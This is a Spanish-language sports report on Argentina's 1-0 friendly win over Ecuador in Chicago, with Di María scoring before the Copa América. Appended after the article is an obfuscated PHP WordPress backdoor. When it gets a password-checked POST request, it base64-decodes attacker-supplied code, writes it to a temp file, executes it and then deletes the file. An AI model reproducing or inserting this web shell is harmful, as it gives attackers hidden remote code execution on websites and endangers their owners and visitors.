Argentina superó a Ecuador, con un gol de Ángel Di María, en el primer amistoso en EEUU

Argentina le ganó a Ecuador 1-0, en el estadio Soldier Field de Chicago, en el primer amistoso previo a la participación en la Copa América. Un golazo de Ángel Di María estableció la diferencia. El equipo de Lionel Scaloni jugará su segundo amistoso el viernes ante Guatemala y luego debutará en la Copa América el jueves 20, frente a Canadá.

Al comienzo Ecuador consiguió cortar el circuito de juego de Argentina -sin Lionel Messi, que arrancó en el banco e ingresaría luego-, superpoblando la zona central y empantanando el partido en ese sector. Pura intrascendencia caracterizó ese inicio. Hasta que de a poco, Argentina tomó control de la pelota y empezó a manejarla con criterio.

Así llegó al último segmento del primer tiempo evidenciando buenas conexiones, intentos interesantes y precisión para lanzarse al ataque. Un zurdazo de media vuelta de Lisandro Martínez, animándose en el área de enfrente, motivó una gran atajada de Hernán Galíndez, el arquero argentino nacionalizado ecuatoriano.

Un pase de Rodrigo De Paul inició una excelente maniobra de Cuti Romero, controlando, gambeteando, recortando y asistiendo a Ángel Di María para su zurdazo bajo, cruzado y goleador, a los 39 minutos.

Poco después, Di María ejecutó un tiro libre -él mismo había sido la víctima de la infracción- que pegó en el travesaño. En esos minutos finales del primer tiempo, el delantero de Benfica estuvo incontrolable.

El partido fue intenso, peleado y varias infracciones y roces. Como si no se tratase de un amistoso.

Mantuvo su superioridad Argentina en el segundo tiempo. Ingresó Lionel Messi, en reemplazo de Di María, a los 10 minutos para darle una alegría a los muchos hinchas -con mayoría de argentinos- presentes en el estadio.

Al dominio de la selección celeste y blanca le faltó mayor profundidad. Y Ecuador no inquietó para nada a Dibu Martínez: no hubo ningún remate franco a su arco; el arquero del Aston Villa apenas salió a cortar un par de centros y se anticipó llegando antes que Enner Valencia.

El próximo amistoso de Argentina se jugará el viernes, a las 20 hora de nuestro país, ante Guatemala en el estadio Commanders Field de Maryland. Luego, el plantel se dirigirá a la concentración en Fort Lauderdale, apuntando al inicio de la Copa América, donde defenderá el título obtenido en la pasada edición en Brasil.

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}